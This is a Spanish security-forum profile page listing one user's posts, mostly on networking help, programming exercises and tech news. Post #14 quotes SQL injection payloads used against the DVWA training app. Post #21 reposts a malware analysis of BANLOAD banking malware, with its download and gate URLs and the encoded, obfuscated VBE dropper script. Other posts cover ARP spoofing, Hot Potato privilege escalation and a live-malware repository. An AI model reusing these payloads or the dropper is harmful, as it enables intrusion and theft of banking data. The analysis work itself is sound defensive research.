Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - D3ivid

#1
Muy buenas tardes, cuando monto un pc en una empresa que tiene su propio cpd, y las conexiones las administra por rosetas identificadas en la pared, resulta que conecto un ordenador a una roseta, hago un ipconfig /all para comprobar mac y la ip, pero no me da ip. Mirando las conexiones de red me sale que está desconectado y si conectan un teléfono voip si que funciona
Me dicen que puede ser la tarjeta, pero cuando la traigo al taller y la pruebo me da la ip y todo está en orden.

¿Qué pruebas puedo hacer para averiguar que es lo que pasa? Puedo tener la mac bloqueada por algún tipo de protección en sus servidores... nosé que más puedo mirar revisaron la configuración de red y todo está bien.

Gracias 
#2
Dudas y pedidos generales / Duda con ssh
Enero 19, 2018, 11:17:38 PM
Muy buenas a todos, quiero montarme un servidor de prueba en una máquina virtual para conectarme de forma online desde fuera de mi red, es decir, con la ip exterior, el problema es que no me conecta.

La arquitectura (por decirlo de alguna forma es )
Ubuntu server tiene conectado ssh por el puerto 22 el usuario es root, y está en adaptador puente.

Cliente windows 10 el cual me hace ping a la ip de fuera del servidor, pero no sé por que no me conecta. He probado varios comandos
ssh -p22 root@laip
ssh root@laip
ssh root@laip:22
ssh root@laip -p22

pd: el puerto 22 lo tengo abierto tanto en el router como en la máquina, de hecho lo he probado con red interna y funciona...

pero nada, si alguien me pudiese ayudar se lo agradecería.

Un saludo
#3
Muy buenas a todos, me gustaría encontrar una explicación válida para entender mi problema. En el módulo de seguridad, tenemos que hacer pruebas, consigo hacer el arp spoofing pero cuál es mi sorpresa por el cual una veces leo el tráfico del objetivo, y otras veces, leo tráfico de otro pc en la misma red.

Para contextualizarlo, estas pruebas se hacen entre los 15 alumnos. Puede pasar que al haber más personas haciendo el arp, por casualidad, coincida mi mac objetivo con otro pc?  Muchas gracias :)
#4
La gran biblioteca





Esto es todas las editoriales contenidas, merece la pena echar un vistazo.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#5
Muy buenas a todos, hay veces que vamos googleando sobre un libro, con el fin de saber si merece la pena el precio, si será para nuestro nivel y demás. Por ello a ver que os parece crear este hilo diicendo los libros que nos hemos leido y un poco que temas toca sin hacer spoiler sobre libros de informática.

Fundamentos de programación, de Jose Luis goyanes, es un libro genial para iniciarse, es verdad que es largo, pero no hay que estresarse, ese libro toca por orden cronológico (creo), arquitectura del pc, luego te va explicando el poque de los lenguajes, y sus diferencias, se pasa dos temas, explicando pseudocódigo, para empezar a pensar como un programadór, y acaba el libro por hacer un breve paso por C, C++, Java. Lo recomiendo 100%


Aprenda a pensar como un programador en python. Este libro seria genial, para leerlo en segundo lugar, ya que tiene muchísimos ejercicios, que te va a enseñar como hacer código, memorizar sintaxis. Y toca casi todos los temas, tampoco se mete muy en profundidad, pero se ve las cosas básicas con mucho detalle y con mucha práctica.


Ya iré añadiendo más, tampoco hay que hacer esto muy largo xD. Espero os guste la idea
#6
Off Topic / Liberan el código del apolo 11
Julio 08, 2016, 07:58:01 AM
Liberan el código del apollo 11

Apolo 11 fue una misión espacial tripulada de Estados Unidos cuyo objetivo fue lograr que un ser humano caminara en la superficie de la Luna. La misión se envió al espacio el 16 de julio de 1969, llegó a la superficie de la Luna el 20 de julio de ese mismo año y al día siguiente logró que 2 astronautas (Armstrong y Aldrin) caminaran sobre la superficie lunar. El Apolo 11 fue impulsado por un cohete Saturno V desde la plataforma LC 39A y lanzado a las 13:32 UTC del complejo de Cabo Kennedy, en Florida (EE. UU.). Oficialmente se conoció a la misión como AS-506. La misión está considerada como uno de los momentos más significativos de la historia de la Humanidad y la Tecnología.


La tripulación del Apolo 11 estaba compuesta por el comandante de la misión Neil A. Armstrong, de 38 años; Edwin E. Aldrin Jr., de 39 años y piloto del LEM, apodado Buzz; y Michael Collins, de 38 años y piloto del módulo de mando. La denominación de las naves, privilegio del comandante, fue Eagle para el módulo lunar y Columbia para el módulo de mando.

El código esta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Fuente No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Espero a alguien le sea interesante y le encuentre utilidad. :)
#7
Muy buenas pues me descargado varios archivos .vmdk los quiero pasar a VDI para virtualbox y me da este error



Mis dudas... en internet circula un comando que parecido es con vboxmanage clonehd  y luego mirando en el manual de virtualbox sale uno de clonemedium ambos me dan el mismo error. He comprobado, las rutas están bien, lo he probado en el disco C e incluso en la misma carpeta de virtualbox, pero siempre me dá el mismo error. Aportes, tengo windows 7 y virtualbox 5.0.24.

Agradezco toda ayuda, y si necesitais más info pedirla, era por no atosigas
#8
theZoo: una base de datos de malware para analizar


Malware DB es un proyecto mantenido por Yuval Nativ No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que recopila una buena lista de malware para su análisis. Su objetivo es permitir a las personas que estén interesadas en el análisis de malware, o tal vez incluso como parte de su trabajo, tener acceso a malware "vivo", analizar las formas en que operan e incluso permitir a las personas con experiencia bloquear malwares específicos dentro de su propio entorno.

También llamada theZoo se trata de una base de datos de malware con licencia No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que tiene un catálogo de lo más interesante: AndroRat, Careto, Duqu, CryptoLocker, Carberp, Zeus, ... y muchos más. Cada No tienes permitido ver los links. Registrarse o Entrar a mi cuenta tiene por defecto 5 ficheros:

- Los ficheros de malware en un ZIP cifrado
- El hash SHA256 del primer archivo
- El hash MD5 del primer archivo
- El fichero con la contraseña
- El fichero index.log para el indexer

Eso sí, recordar que hay malwares actuales y peligrosos! Vienen "cifrados" y bloqueados por una razón! NO ejecutarlos a menos que se esté absolutamente seguro de lo que se está haciendo! Son para ser utilizados sólo con fines educativos (y nos referimos a eso!) !!!

Se recomienda ejecutarlos en una máquina virtual sin conexión a Internet (o una red virtual interna si es necesario) y sin adiciones de huéspedes o cualquier equivalente. Algunos de ellos son gusanos y tratarán de propagarse automáticamente. Por su puesto, si se ejecutan en un entorno no controlado el resultado será infectaros a vosotros mismos. Avisados estáis:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Fuente: :hackplayers.com


Pd:Esta información nosé si está bien aqui o en la zona de malware, cualquier cosa avisar o moverlo segun convenga. Espero que os guste
#9
E-Zines / Linux magazine en español (completa)
Enero 19, 2016, 03:24:09 PM
Linux magazine en español (completa)


Bueno alguno ya sabreis que en 2014 echó el cierre la revista mas antigua de linux en castellano. pero no lo hizo de cualquier forma de la web No tienes permitido ver los links. Registrarse o Entrar a mi cuenta vi que estaba la colección completa para descargar desde torrent, para todo el que la quiera obtener la revista No tienes permitido ver los links. Registrarse o Entrar a mi cuenta podrá obtener el torrent.

Pd: Espero os sea útil tanto para veteranos en linux, como para nuevos como yo :)
#10
Escalada de privilegios en Windows: Hot potato




Escalada de privilegios en windows 7, 8, 10, server 2008 y server 2012

Hot potato aka potato, aprovechó unas publicaciones ya conocidas de windows, que se podía usar para escalar privilegios, concretamente NTLM relay (específicamente HTTP->SMB relay) y spoofing NBNS. Usando esta técnica, nosotros podemos elevar privilegios en una estación de trabajo windows  desde los niveles más bajo   "NT AUTHORITY\SYSTEM" - al nivel más alto de privilegios disponible en máquinas Windows.

Esto es importante por que desafortunadamente algunas organizaciones confían en la cuenta de privilegios de Windows para proteger su red corporativa. Este es el motivo de que algunos atacantes sean capaces de acceder y escalar privilegios  en alguna estación o redes con servidor  windows, ellos pueden utilizar este acceso para avanzar un "movimiento lateral" y comprometer otros host del mismo dominio. Como un atacante, podemos obtener acceso al ordenador como usuario de bajo nivel o cuenta de servicio. Cuando obtenemos un acceso de privilegio algo alto en un host es un paso critico en un test de penetración, y por lo general es realizado en un No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ya que hay no conocen exploits públicos o técnicas para hacerlo de fuentes confiables.

Las técnicas que usan estos exploits que se benefician de la escalala de privilegios no son nuevas, pero en la forma en la que esto se combina si. Microsoft es consciente de todas estas publicaciones y han sido desde hace tiempo (circa 2000). Esto es desafortunadamente es malo para fijar sin romper la compatibilidad hacia atrás, es decir, que windows 10 sea compatible con 8, 7..., esto ha sido aprovechado por atacantes desde hace cerca de 15 años.

El exploit consiste en 3 partes, todas son configurables desde la linea de comandos. Cada parte corresponde a un ataque ya conocido que ha sido usado hace años.

Spoofer local NBNS

El NBNS es un broadcast de protocolo UDP para resolver nombres usados comunmente en entornos windows.

Falsificación Server Proxy WPAD

En windows, Internet explorer por defecto intentará detectar para la configuración se ajustes en la red proxy para acceder a la url "http://wpad/wpad.dat""

HTTP → SMB NTLM Relay

Parte de windows integrada en la suite de autentificación de protocolo. Esencial para el diseño de challenge - response


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Windows 7


Windows server 2008


Windows 8, 10, server 2012



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

PD1 Traducción propia, espero no hayan muchos fallos, y si los hay comentarlo y lo solventaré inmediatamente, me servirá para aprender.
PD2 Espero sea del agrado vuestro y lo disfruteis :)

#11
Luz solar y una impresora 3d es todo lo que necesitas para la construcción de este ingenioso reloj solar que muestra la hora con dígitos.

Desde la fabricación de la primera pieza con tecnología de impresión 3D en 1983, Charles W. Hull no imaginaba ni por asomo que 33 años después, su invención iba a transformar por completo el proceso de fabricación y construcción de todo tipo de objetos. Desde No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y circuitos impresos hasta ropa, comida e incluso objetos más voluminosos como casas a escala real. Ahora esta tecnología vuelve a sorprendernos con un singular proyecto open-source para construir tu propio reloj solar 3D que proyecta la hora como si de un reloj digital se tratara.




Con la idea de prescindir de componentes electrónicos y baterías, Julien Coyne ha utilizado la luz solar y el potencial de la impresión 3D para unificar en un solo objeto las ventajas de los relojes de sol con la imagen sofisticada de los relojes digitales. Aunque el prototipo no es perfecto, Coyne asegura que este reloj solar 3D puede dar la hora con precisión desde las 10 de la mañana hasta las 4 de la tarde, con lapsos de tiempo de 20 minutos.

Además, el ingenio de Coyne permite ajustar con precisión la hora girando el cilindro microperforado, llamado gnomon, para mostrar con mayor definición la hora proyectada, e incluso ajustar el reloj al horario de verano.

Su creador ha puesto a disposición pública el código fuente para fabricar este prototipo inspirado en la filosofía del "hazlo tú mismo", así como el modelo 3D en formato No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para que cualquier usuario interesado pueda descargarlo libremente e incluso mejorarlo para crear un prototipo mucho más preciso.


El diseño de este reloj está compuesto por un cilindro microperforado en base a una serie de patrones matemáticos, cuya posición permite dejar pasar la luz a su través en función de la posición que ocupa el sol en cada momento del día. De forma que se puede visualizar con precisión la hora actual con los dígitos iluminados por el sol dentro de la sombra arrojada por el propio reloj.

La tecnologia de impresión 3D juega un papel importante en la fabricación de este gadget, ya que se requiere gran precisión para materializar el juego de microperforaciones del patrón matemático de la base del gnomon. Y gracias a la generalización de este tipo de impresoras para uso doméstico, cualquier usuario tiene ya acceso a este tipo de tecnologia para construir cualquier objeto que desee.



Para completar el proceso de fabricación de este reloj solar 3D, se requieren elementos de uso cotidiano como un tarro de mermelada vacío, tornillos de diferentes longitudes, tuercas y arandelas. Pero para no perderse con los pasos, Coyne ha elaborado un interesante video tutorial de montaje para seguir paso a paso todo el proceso de fabricación y montaje. ¿Te atreves a crear tu propio reloj solar 3D?

fte: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#12
Visualiza el tráfico de la red Tor con TorFlow


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta son un conjunto de scripts creados en python para estudiar la red tor, analizar su tráfico y medir la fiabilidad de los diferentes nodos de conexión, que ahora también podemos disfrutar de manera interactiva y ver en toda su magnitud gracias a un nuevo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, que nos ofrece espectaculares mapas y una maravillosa visión del tráfico de la red.

Más allá de la belleza de la escena, con sus constelaciones de servidores y áreas de conexión, llama la atención que la mayoría de servicios de red estén concentrados en Europa Central y la escasez de los mismos en Asia, Australia o América Latina.



Además de observar las tendencias de tráfico actuales, TorFlow nos permite analizar los niveles de tráfico históricos –cuenta en la parte inferior con una barra de desplazamiento para el timeline– y filtrar los datos por países, tipos de servicios (ocultos o de tipo general), nodos o conexiones.

Más información en la No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y si estáis interesados en saber mas sobre la estadísticas del Proyecto Tor, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta donde buscar.

Dada la popularidad de Tor como la principal red de anonimato a nivel mundial, sería de esperar algo más de diversidad.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#13
Python / Dos ejercicios para practicar con for in
Octubre 06, 2015, 02:56:11 AM
Bueno, hace ya unas semanas que no posteaba los ejercicios del libro "Introducción a la programación". La verdad que te enredas a ver y a aprender cosas y la mente se dispersa. En fin hoy traigo dos ejercicios  puesto que son muy básicos.

Ejercicio 121 dice Haz un programa que muestre, en líneas independientes y en orden inverso, todos los números pares comprendidos entre 0 y 200 (ambos inclusive).

Código: python

# Programa que muestre en lineas individuales
# todos los numeros pare comprendidos entre 0 y 200 ambos inclusive
# orden inverso

numero = 0

for numero in range(200,-1,-2):
#La unica miga es el range puesto que lo que dice que empiece en 200  hasta -1 (no inclusive) es decir hasta 0,
#y el -2  simplemente es que le vaya restando
    print "el numero: %d\n"% (numero)


El ejercicio 122 dice Escribe un programa que muestre los números pares positivos entre 2 y un número cualquiera que introduzca el usuario por teclado.

Código: python

#Muestra todos los numeros pares desde 2 hasta el numero que le indique
# el usuario por teclado



numero = int(raw_input('Introduzca un numero'))

for x in range(2,numero+1):
#En este e hecho una variante para que diese igual el numero que ingreses, en el anterior estaba sujeto a númer extrictos
#este pongas el numero que pongas siempre te dará lo que le pides, ademas el numero+1 es para que nos salga hasta
# el numero indicado inclusive.
    if x % 2 == 0:
        print x, " es numero par"



Viendo este tema y para que no quede muy escueto  voy a poner un trozo de teoria sacada del libro que viene al tema del range, y se trata del error conocido como Obi Wan.

Puede resultar sorprendente que range(a, b) incluya todos los números enteros comprendidos
entre a y b, pero sin incluir b. En realidad la forma ((natural)) o más frecuente de usar
range es con un sólo parámetro: range(n) que devuelve una lista con los n primeros números
enteros incluyendo al cero (hay razones para que esto sea lo conveniente, ya llegaremos).
Como incluye al cero y hay n n´umeros, no puede incluir al propio número n. Al extenderse el
uso de range a dos argumentos, se ha mantenido la ((compatibilidad)) eliminando el último
elemento. Una primera ventaja es que resulta fácil calcular cu´antas iteraciones realizar´a
un bucle range(a, b): exactamente b - a. (Si el valor b estuviera incluido, el número de
elementos sería b - a + 1.)
Hay que ir con cuidado, pues es fácil equivocarse ((por uno)). De hecho, equivocarse ((por
uno)) es tan frecuente al programar (y no sólo con range) que hay una expresión para este
tipo de error: un error Obi Wan (Kenobi), que es más o menos como suena en inglés ((off
by one)) (pasarse o quedarse corto por uno).


Pd: Espero os sea útil, y cualquier comentario es bienvenido :)
#14
Muy buenas, estoy siguiento un tutorial en el que tengo que buscar en la base de datos X cuando ejecuto este comando.

%' and 1=0 union select null, table_name from information_schema.tables #     Y comprueba que esa tabla existe.

%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#  Si pongo este comando me da los datos de usuarios de la tabla information_schema.  El problema es si lo pongo con el nombre de la tabla que corresponde, me muestra como resultado SELECT command denied to user 'dvwa'@'localhost' for table 'tables'   eso quiere decir que el comando esta bloqueado, es decir, lo tengo que hacer de otra forma?? Sé que es muy basiquero pero según los ejemplos creo que deberia de darme el resultado. Comentar cualquier cosa que pueda aportarme para aprender gracias
#15
Dudas y pedidos generales / Problema con la ram
Septiembre 30, 2015, 12:00:07 PM
Buenas underc0deanos, quisiera que me informarais sobre el tipico archivo para liberar  ram.

El tipico archivo .vbe con Si tienes 128 Mb de memoria RAM o más escribes Mystring=(80000000)

Pues he tenido problemas con la ram que no me iniciaba el sistema operativo pantallazo azul. Y nose si por intuición limpié la ram y funciona genial.

Mi pregunta es, el abuso de eso archivo puede causar problemas o simplemente es parte del mantenimiento y cosas que pueden pasar??? Gracias de verdad.
#16
Dudas y pedidos generales / [SOLUCIONADO] Fallo con gpg4win
Septiembre 24, 2015, 09:17:43 PM
Muy buenas familia, el problema es que no comprendo muy bien el funcionamiento, o bien no lo hago bien.

Me explico, creo un certificado, y cifro un archivo, si quiero que lo lea otra persona que tengo que hacer cifrarlo con mi clave y pasarsela, o que el me pase su certificado, lo importo y lo cifro con su clave para que lo descifre él con su clave?? Gracias a ver si me pudieseis ayudar por que no entiendo eso...
#17
Off Topic / La enciclopedia de los virus
Septiembre 13, 2015, 12:48:31 PM
Muy buenas underc0ders, buscando por internet escritores de virus y tal, he dado con el conocido en el mundo de los escritores Griyo que pertenecia al grupo de hackers 29a.

Pues navegando he dado con una wiki sobre virus, que si muestran los códigos, pero el concepto de la creación y algunas cosas técnicas, echarle un vistazo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, espero que os guste. :)
#18
Windows / [MinGW] Instalación de un Compilador en Windows
Septiembre 07, 2015, 08:58:39 AM

Buenas a todos!

Este primer minituto o paper,  tiene objetivo  explicar cómo saber si se tiene un compilador y, en caso de tenerlo, si  funciona correctamente. Por último,  de no contar con ninguno, señalar cual es el procedimiento para su instalación.

En primer lugar, voy a explicar qué es un compilador, para qué sirve y cómo se usa.

Para empezar, un compilador, lo que hace generalmente es traducir un programa de alto nivel en un ejecutable, aunque no siempre es asi. Hay muchos tipos de compiladores distintos y partes, para quien quiera más información, acudir No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

La teoría de cómo se usa es la siguiente: mediante notepad++, sublime, geany, o cualquier otro editor de texto,[ no confundir con entornos de programación, como visual studio, dev c++, eclipse, los cuales ya llevan incorporado este programa haciendo el trabajo de edición, compilación y ejecución de forma automática, mediante combinaciones de teclados], hacemos  el típico código de 'hola mundo', al que llamaremos  hola_mundo.c

Código: c

#include <stdio.h>

int main()
{
        printf("Hola underc0deanos");
        return 0;
        getchar();
}


Lo guardamos en el escritorio. Como dije antes, al ser solo un editor de texto, el trabajo de compilación (traducir a código máquina y convertirlo en .exe) corre de nuestra cuenta, y el de ejecución también.

A continuación, iremos a la consola de comandos para comprobar  si tenemos un compilador o no. En windows el compilador más conocido es MinGW, y para ver si lo tenemos vamos a donde hayamos guardado el programa hola_mundo.c , como dije a escritorio.

Basta con poner cd Escritorio. Una vez ahí, ponemos lo siguiente para compilar el programa:

gcc hola_mundo -o ejecutable

Tarda un poco en leer, si abajo nos sale la misma ruta sin más, tenemos el programa compilado y sin errores; por el contrario, si nos dice: "El archivo nos se reconoce como un comando interno..." es que no tenemos instalado un compilador. Si este es tu caso, lee la parte "COMO INSTALAR UN COMPILADOR EN WINDOWS".

Si por el contrario,  has compilado, tan solo escribe en la consola de comandos y en la ruta que dijimos anteriormente:  hola_mundo;  y veréis el mensaje que codeamos.

COMO INSTALAR UN COMPILADOR EN WINDOWS

El más usado, como dijimos antes,  es MinGW. Puede bajarse de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Lo instalaremos al más puro estilo old school de windows... el conocido como siguiente, siguiente,siguiente....

Una vez descargado e instalado,   en la izquierda veremos que pone 'All packages';  se nos desplegará una lista de paquetes y señalaremos para C++ y C.  Lo siguiente, todo lo que ponga mingw32-gcc y mingw32-gcc-g++ , para nuestro objetivo alcanza con eso. (Si os interesan más cosas ponerla en el post).
Cerramos, volvemos abrir y vemos si todo está ya en verde.

El siguiente paso será ponerlo en las variables de entorno. Eso está- en la versión xp- en mi pc > botón del ratón derecho, "propiedades"> opciones avanzadas> variables de entorno>; y en variables de sistema, buscar path, lo seleccionamos, y continuación damos a modificar. Finalmente,  colocándonos en el último lugar, ponemos lo siguiente > C:\MinGW\bin, le damos a aceptar y ya estamos preparados para compilar el programa.

Pd: Espero os guste, he evitado fotos para no hacerlo muy extenso. Cualquier critica constructiva será beneficiosa tanto, para aprender como para mejorar el texto.

Pd de la Pd: No seáis muy duros
#19
Modern windows exploit development






Descargar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#20
Muy buenas, especifico la version de sublime por que por lo que he leido hay diferencias entre la version 2 y la version tres. ¿Me recomendais más una que otra?

Por otro lado, ando investigando como compilar un archivo en C desde sublime, (lo he conseguido). El problema es que me da fallos, cuando intento hacer un programa que solicite datos al usuario. He visto un tuto, que explica como sacar la consola de comandos, para esta faena, pero lo que leo es para sublime 2, ¿alguien a conseguido esto, en la versión tres?

Os agradezco todo tipo de aportaciones. Gracias
#21
Buenas os dejo el código por gentileza de malwaremustdie, de un malware orientado a bancos brasileños. El post es largo pero prefiero pegarlo aqui y el enlace ya que lo pueden bloquear. Espero os interese

Código: vb

# Brazil basis BANLOAD malware campaign is shifting to the AMAZON VPS in AS16509 on:
# martinstranns.com.br // gates (cnt.php)
# brcentermodelo.com.br // payload, updates, parts
# AWS IP: 52.8.140.254 and 52.8.51.135
# Malware MUST Die!!

// Sample:

SHA256:         8538c78539832eaf25550bdf0ab1a9f9f004459af0208cf4d047aa41dfb6f260
File name:      ValeViagem.vbe

A VBA Encoded and Obfuscated Script to Download and Send Sensitive Information to
South America Banking malware

// Gates:
http://martinstranns.com.br/contador/cnt.php

$ ipchk geo martinstranns.com.br
-----------------------------------------------------------
Source : geo
IP     : 52.8.140.254
-----------------------------------------------------------
{
  "ip": "52.8.140.254",
  "hostname": "ec2-52-8-140-254.us-west-1.compute.amazonaws.com",
  "city": "San Jose",
  "region": "California",
  "country": "US",
  "loc": "37.3394,-121.8950",
  "org": "AS16509 Amazon.com, Inc.",
  "postal": "95103"
}

// payload
http://brcentermodelo.com.br/arquivos/up.jpg

// updates & parts:
http://brcentermodelo.com.br/arquivos/host.jpg
http://brcentermodelo.com.br/arquivos/part.jpg

$ filemd5 *
up.jpg:   PE32 (DLL) (GUI) Intel 80386 MS Windows 45568   692eedb2b519b86f9d5a1e4a85b7b606
host.jpg: PE32 (DLL) (GUI) Intel 80386 MS Windows 1483776 8fdaa336d4699a02f1d349c4d7984993
part.jpg: PE32 (native)    Intel 80386 MS Windows 40208   d5915a4c454e50d76b343019d9978373


$ ipchk geo brcentermodelo.com.br
-----------------------------------------------------------
Source : geo
IP     : 52.8.51.135
-----------------------------------------------------------
{
  "ip": "52.8.51.135",
  "hostname": "ec2-52-8-51-135.us-west-1.compute.amazonaws.com",
  "city": "San Jose",
  "region": "California",
  "country": "US",
  "loc": "37.3394,-121.8950",
  "org": "AS16509 Amazon.com, Inc.",
  "postal": "95103"
}

// ======================
// Microsoft Encoded Script
// ======================

#@~^oh8AAA==vCeMCeCeeCeCMeCeMeCeMMCeeCMB@#@&BCMMeCeCe$X~37W RcMeCeMMCeev@#@&BMeCMCeM
CeCeeCeCMeCeMeCeMMCB@#@&9ksP\5qd%yYl(nk8f9 +@#@&j+DP%z~4!8"sm(vWWdPx,ZM+lD+}8LmO`r
j^MkwD ?4+V^Eb@#@&?Y~\}qk%+Ylp+b4f[y Px~;DnlDn}4%mD`JUMywDkUocsrs?XkO+sr4Nn^Yr#@#
@&KjX]4"cR{%7bpik\AX,'~LH$(!8.:1qvW0d Io]+mNcE_|Stw?}sKq)]2'Hbm.WdG6YwbUNKhd~gK-
/;MDnxD#DdbW   -nMW9;mD1C:Jb@#@&q0,cq ?YMcKjlI4"c0{R\)(`d\qhXS,JGEb,@!@*PZb,W.,`&x?
DDvKjlIn4.c0{R\boi/7hlS~JjkkYCJb~@!@*~!*~WMPc( ?Y.chjXI8.c0F%7b(`/7   hl~~JRJb~@!@*P
ZbP:t+  @#@&d&0,jm.raY bMLEs+UOkRZG;   Y~',T,K4x,@#@&idUnY,I5*+/ULly?a2AlD!ys/6R RN9+
Ptn}K&:~',Z.nmY+68N+^YvEUtn^VcbwaVb^lDkGxr#@#@&idI$Xvkxol"jwaAlDT s/X%+%99+:}Fth&K j
4+sVAam;D+,JhkMywDRn6JS~q?MywDR?1.rwDs!Vs1ChP'Pr~ur~~S,JD;Um/E~,q@#@&7iUmDbwD p!
kO@#@&d3U9Pq6@#@&AxN,(W@#@&na&H,8zhAALa9KAG/;oH8LnPxPNz~4T(ysmq+c6JRA62l       N3U7kDKU:
xYUO.k  ok`E]jeUK3H"6r:]Eb@#@&qW~v\}Fk0yYXo+b4&9 y sbVn2XkdOk`naf1O4Xh$ALavxW$W//TH8o
n~[,Jw5o0sUO WJ*b,K4x@#@&dq?1.kaY p!kO@#@&+x9~k6@#@&knOPd4V 4\p"&PxP7}Fk%+Ol(+r82N
+ c/M+CD+:+6Dsbs+vn2&g,8zhAhN2vxWAK//ot4T|~[~E';p0qsxO WEBP S~DD;+*@#@&S8V 4\(.qc/VK
/n@#@&B  cR)z]p`q.}~]I&)cR Rv@#@&LzA(T4.:^(+c0J "EU`r^sN~Jm,+m4W,]I@*@*~Jr]jeUK2t]r}
K]'Y/rtn`K3IH)t2Y{hCDDRE'rDJ'EMJ'JbErJbB!BKD!+@#@&BcR R=.)]&b.A(?=RRc v@#@&LHA8!8"sm
(vWWScI;UvJmh[,z^PknD6 6PjhSn#b"q)Ad2~ErtYD2)Jz4M^nxD+M:GNnsKR^Ws 4MzC.$Ek-Gkz;wc%
aoErPJHJ*~ZSKMEn@#@&Lz$(!4.hm&vc6J I!xvJ^:[~Jm~/O6c+an,Ew-CMkC4^n,]]z1GrHuPJ\J*~T~:
D;n@#@&Bc Rc)bj(jb")cR Rv@#@&LzA(T4.:^(+c0J "EU`r^sN~Jm,D+TP$;+MX~CnS\wU5?:3H'ZW        O.W
^?YT!qwU+.\b^+k-!ELJ4E'rwE[rjr[E7J,[P|@#@&EPL[dm4YCd0/PJ/IAbKA~&s,zUZ~rH/AP&?:~J,[~
oKD:COGlO+:rs+cGlD+b9NvExr~~ BPHGS`#*Sc*P[,E~z:1,JE     {3wb0fl0OZAT0 cFq %{*+Ry*)2sy%A
A O$8WJEPJK]~rJms[PJmPk^4Ym/0/~z93d2P2,&KgPEEPG2o)RfX% T~!0 c8Fv %FXv  Xb2s+0~2 O$8W
JJ,&oPL/Dl.Y~v,B~JrEJ4YO2=zzhCMYrxkOMlU /cmWsR(.z1WUYmNG.JmxD w4wg!.s']n^ELkUD]]/rtK
j:2]HzH2YD mUOrErJErPJIj,?IjKAHEPLPm@#@&JP-k/1tYmdV/,z;I3bP3,zoPJjZ,rH/APzjP,J~[,oKD
hmYGlYKbh+vfCYb[[vJxrSPy~PgGA`*#BcbP'~rP&Kg~Jr        {3wb%9XROTAZ0 cq8v %Glv +*z&o RA3+O
A8WEJ,zK"~EJ1:9P&m~d1tOlkV/,z93d2K3~JKHPrEPG3wbRf*ROZ$!RO*F8vR0F*v +*z&sy0$2y,~8*JE~
Js~[kOlMY~v,BPEErJ4YD2=z&slMYk  /D.l    xdR1Wh (Dz1GxDlNK.&m    Ycw4w_;MVx$g&bY$Y/}HniPAIHb
t3uTR1x JJrJrEPJIiPU5jPAHJ*S!BKD!n@#@&ERcR )iKGbP2= RcRv@#@&LX$8Z4":1(+cWdR"ExvJ1hN,
z^Pkm4Om/3k~z;I2zP3PJs,zjZ~6g?Pb"PPJf3Jz5PTTZ,l!Z~JKH,Jr        GAsz0fl%R!~!0RWFF+R%F*v +Xb
2sy%$2+1~8EJ,EPLPm@#@&JzP],JEms[,z^,4bY/mNsrx,zODmxdWDPDYIz1f}\YPJfKhUVGC9P&n"(r"qP
e,Cq!u,]indFjb]&b~S2uPuj5UK3H"r6Pu-]!2\mDkm8s+uRD:2J~',{@#@&r~[MEU[^V&+ 6nPujI?PAH"
rr:]'YEa\CDbl8s]RDhwBaFrE~z"j,?e?P3tJb~ZSKMEn@#@&BR  c)]2&H&) cRcB@#@&LH$4Z4":1q*6
SR";xvJms[~z1Pkm4YCd0/~z;]2zK3~JsP&j;P61;3,zj:PrP[,sK.:mY9lD+Prs+`GCYbN9cExr~,F*~~H
Khc#*Sc*P'~|@#@&E~JKHPrEPG3wbRf*ROZ$!RO*F8vR0F*v +*z&sy0$2y,~8fJE~JK]PrEmsN~&1P/^4Dl
d3k~Jf3d2:2PJKg~Jr      {2wb09l%OZ$!ROc8qORGlvR X)2s+%~3 OANfrJP&o,[dt!O9WA    PJDPJY,!,zW
JrP&]`P?IjKAHJ*ST~:D!+@#@&v cR )nJ)cR  E@#@&%z~4T4.h1qW0dRI!xvEmsN~z1Pd^4YlkV/,zZ"3
)KAPJs~zj/,rHZA~zUK~E,[PoGM:CYGCD+Pb:`fmY)N9`Exr~~*BP1KA`*#~Wb~[,{@#@&EP&PgPEJP{2w
b09l%OT$Z%Rc8q+O0F*+O lb2o RA3 OANqrJPJPI,JJ1h[PJm,4rYdC9:rx,&YMlUd6+D~VuI)1G6t]~JfK
hx^Wm[PJn]q}I(PIPC&!C,JJ4OOw=zJ4.mnUD+.:K[+^W ^K:R8.Jl.;!r7WdJtK/YcLaLJrPEJu?ej:2H"6
r:]-u/6Hhj:2]1)\A] Ys2JrJ~',{@#@&E,[dm4Om/VkPJf2d2:3PJKHPrJ`{AsbR9*RO!~T0OWF8vR%{X+O
+*zfsy%$3y,ANqrJ~zw~L+^4W,F!Z&y@*PrJY?I?P3tIr}P]']Ea-CDbl(Vn]EErJ~z"iPU5jPAHJ~',{@#@
&r~L[.oc+6Pz9f,JECnS\wUW0DAlM+-tr^DK/K0O-     r       NGhkwZ!D.n      Y.n.kkGx']!
xErPJ\PuZ}\n`K3I
gb\3uPzD~IAM{Ut~z9PrJ.EU[^Vf ,Y?I?P3tIr6Pu-YZ}\hjPAIgbHA]cO:a~:FrJ~&wJ#BT~:DE@#@&Bc
